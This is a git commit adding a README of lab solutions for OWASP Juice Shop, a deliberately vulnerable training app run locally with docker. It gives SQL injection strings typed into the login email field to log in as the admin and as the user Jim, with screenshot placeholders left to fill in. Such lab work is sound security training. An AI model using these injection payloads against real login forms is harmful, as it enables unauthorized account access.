Add solutions for SQL Injection
This commit is contained in:
parent
05066f1c27
commit
c7093cd7a8
1 changed files with 22 additions and 0 deletions
22
Lab03 - Let's Buy Some Juice/README.md
Normal file
22
Lab03 - Let's Buy Some Juice/README.md
Normal file
|
|
@ -0,0 +1,22 @@
|
|||
# Let's Buy Some Juice
|
||||
## Booting Up Juice Shop
|
||||
```sh
|
||||
docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop
|
||||
```
|
||||
|
||||
## SQL Injection
|
||||
### Login as Admin
|
||||
1. Open `Account` => `Login`
|
||||
2. Type `' OR TRUE; --` into `Email` and any password in `Password`
|
||||
|
||||
Result:
|
||||
|
||||
<!--- ToDo: Insert Picture -->
|
||||
|
||||
### Login as Jim
|
||||
1. Open `Account` => `Login`
|
||||
2. Type `jim@juice-sh.op'; --`
|
||||
|
||||
Result:
|
||||
|
||||
<!--- ToDo: Insert Picture -->
|
||||
Loading…
Reference in a new issue